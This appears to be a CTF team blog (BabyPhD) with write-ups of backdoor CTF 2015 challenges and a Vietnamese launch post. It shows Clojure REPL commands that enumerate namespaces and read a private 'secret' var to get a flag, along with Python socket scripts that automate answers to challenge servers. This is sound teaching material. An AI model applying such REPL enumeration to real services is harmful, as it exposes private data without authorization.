Intrestingly enough, even though it was not expected, Chintu found a cool website to play with, though he can't get the flag. Can you? Visit this. Submit the SHA-256 hash of the flag obtained.

Gaylord : At first, (str (all-ns)) to get all namespaces. And then (clojure.repl/dir noname.people.admin) to see what inside. There is including flag and secret. Used (noname.people.admin/flag) to get the a half of the flag.

Chuymichxinhdep: However secret is a private variable variable, I used ((noname.people.admin/secret)) to obtain the other half of the flag. Problem solved.

backdoor CTF 2015: QR

Category: Misc Points: 70 Author: Abhay Bir Singh Rana Difficulty: Easy Solves: 84 Description:

https://backdoor.sdslabs.co/challenges/QR

Decode some QR codes at nc hack.bckdr.in 8010

chuymichxinhdep:

from subprocess import Popen, PIPE
i = 0
import socket

sock = socket.socket()
sock.connect(("hack.bckdr.in", 8010))
s= sock.recv(1024)
print(s)
while True:
	i=i+1
	string = ""
	s= sock.recv(65535)
	data= s.replace("\x20\x20","0").replace("\xe2\x96\x88\xe2\x96\x88","1")
	file = open('qr','w')
	for line in data.split("\n"):
		string = string+line[1:len(line)-1]+"0"*(47-len(line))+"\n"
	file.write(string[46:len(string)-1-46])
	file.close()
	output = Popen(["python", "sqrd.py", "qr"], stdout=PIPE).communicate()[0]
	print i, output.strip()
	sock.send(output.strip())

Convert the QR to binary only and use Strong QR to decode. After 50 submissions we've got the flag.

backdoor CTF 2015: RAPIDFIRE

Category: Misc Points: 500 Author: Amanpreet Singh Difficulty: TODO Solves: 0 Description:

https://backdoor.sdslabs.co/challenges/RAPIDFIRE

I am enjoying it really. Are you? nc hack.bckdr.in 8007. Submit the SHA-256 hash of the flag obtained.

Chuymichxinhdep: Just use a brilliant source code from gaylord.

import socket, hashlib, time, requests
from geopy import GoogleV3
import re
import shelve
import omdb

host = '128.199.107.60'
port = 8008
rep_countrycode = False

def fib(n):
    i = h = 1
    j = k = 0
    while (n > 0) :
        if (n%2 == 1) : # when n is odd
            t = j*h
            j = i*h + j*k + t
            i = i*k + t
        t = h*h
        h = 2*k*h + t
        k = k*k + t
        n = int(n/2)
    return j

def get_country(place_name):
    gapi = shelve.open('googly_cache', writeback=True)
    try:
        wat = place_name.encode('base64')
    except UnicodeEncodeError:
        wat = u' '.join(place_name).encode('utf-8').strip().encode('base64')
    if (wat in gapi):
        print('[*] Found in shelf')
        loc = gapi[wat]
    else:
        print('[*] Request from GGAPI')
        loc = geolocator.geocode(place_name).raw
        gapi[wat] = loc
        gapi.sync()
    gapi.close()
    for comp in loc['address_components']:
        if 'country' in comp['types']:
            if rep_countrycode:
                return comp['short_name'] # TODO: not short_name but something else
            else:
                return comp['long_name']

def get_release(movie_name):
    gapi = shelve.open('moviee_cache', writeback=True)
    try:
        wat = movie_name.encode('base64')
    except UnicodeEncodeError:
        wat = u' '.join(movie_name).encode('utf-8').strip().encode('base64')
    if (wat in gapi):
        print('[*] Found in shelf')
        loc = gapi[wat]
    else:
        print('[*] Request from OMDB')
        s = omdb.title(movie_name)
        loc = s['year']
        gapi[wat] = loc
        gapi.sync()
    gapi.close()
    return loc
    
def read_until(wat):
    buf = ''
    while not (wat in buf):
        buf += sock.recv(1)
    return buf
    
def read_for_fun(sz):
    d = ''
    while (sz > 0):
        tmp = sock.recv(sz)
        sz -= len(tmp)
        d += tmp
    return d

# init connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
geolocator = GoogleV3()
pii = requests.get('http://www.angio.net/pi/digits/pi1000000.txt').text
# read & answer
while True:
    s = sock.recv(8192)
    if ('code is in CAPS' in s): rep_countrycode = True
    if (s == ''): sleep(10)
    print(s)
    n = 'wat'
    res = n
    if ('sum' in s):
        n = int(re.findall(r'first\ (\d+)\ ', s)[0])
        if ('odd' in s):
            res = n * n
        elif ('fibonacci' in s):
            res = fib(n+2) - 1
        elif ('natural number' in s):
            res = (n * (n + 1) // 2)
        res = str(res)
    elif ('prime' in s):
        n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0]) + 1
        n = str(n)
        page = requests.get('http://numbersofprime.com/prime/' + n)
        res = re.findall(r'', page.text)[1]
        res = res.replace(',', '')
        res = res.strip()
    elif ('md5' in s):
        n = re.findall(r'of\ (.*)\n', s)[0]
        res = hashlib.md5(n).hexdigest()
    elif ('pi' in s):
        n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0])
        res = pii[n+1]
    elif ('fibonacci' in s):
        n = int(re.findall(r'the\ (\d+)(st|nd|rd|th)', s)[0][0])
        res = str(fib(n))
    elif ('binary' in s):
        n = int(re.findall(r'of\ (\d+)\ in', s)[0])
        res = bin(n)[2:]
    elif ('country' in s):
        n = re.findall(r'of\ (.*)\n', s)[0]
        res = get_country(n)
    elif ('release year' in s):
        n = re.findall(r'of\ (.*)\n', s)[0]
        res = get_release(n)
    print '[*] n = ', n
    print '[*] res = ', res
    sock.sendall(res+'\n')

I added pycountry to get the alpha-2 code of country. After 199 submissions we will get the flag. Not a fun challange because of slow server and too many stupid questions.

-chuymichxinhdep.

BabyPhD.

Welcome to BabyPhD!

chuymichxinhdep — Thu, 01 Jan 2015 14:15:26 +0000

Đôi lúc tôi hay một mình

Tự hỏi rằng đời này có bao nhiêu ngày vui*

Các trang blog CTF nói chung thường có hiện tượng bong bóng như kiểu nhà đất Việt Nam thập niên hai ngàn. Ất min ban đầu mới lập cũng chịu khó đầu tư. Dần dần cơm áo gạo tiền và đủ thứ vớ vẩn sinh chán. Thêm nữa hậu duệ kém không kế tục được sự nghiệp nên hỏng cả. Thời còn mông muội, dân tình vào chơi ngõ hầu muốn được cái gì đó nhưng dần dà blog CTF đã không đáp ứng được với thời cuộc. Ngay đến cả thằng đầu xỏ ất min cũng bỏ mẹ qua facebook cầm kiếm nhựa chém nhau. Ấy vậy mà BabyPhD chúng tôi vẫn mạnh dạn mở blog CTF writeup. Ở xã hội thấy thịnh thì phù mà thấy suy thì nhổ có được những thánh thần rơi rớt lại những tính túy cuối cùng của các tay hacker mũ trắng thật là tự thấy mừng cho cộng đồng IT Việt vậy.

Để mở đầu cho chương trình nghệ thuật tấn công đến đâu viết lại tới đấy, chia sẻ chút kiến thức còm cõi cho đồng đạo security, chúng tôi xin hân hạnh khai trương blog BabyPhD với các thành viên trụ cột sau:

chuymichxinhdep: đã xinh đẹp lại còn học thức <3
yeuchimse: lời ít tình chi thít
peternguyen: anh hùng thời loạn
justcallmedude: gay kín không tên
antibkav: loại già có vợ nên luôn là thành viên bỏ đi của team, vớt vát cho nó phong phú
huyna: hiệp sĩ thoắt ẩn thoắt hiện, chỉ thấy xi nhan khi có bài pwn
chim: geohot của nhóm

(Một vài thành viên khác xin giấu tên, số thành viên liên tục cập nhật nếu các bạn apply tại đây)

Xin chào thân ái và quyết thắng

- Chụy Mích

*Đời có bao nhiêu ngày vui - st:Châu Đăng Khoa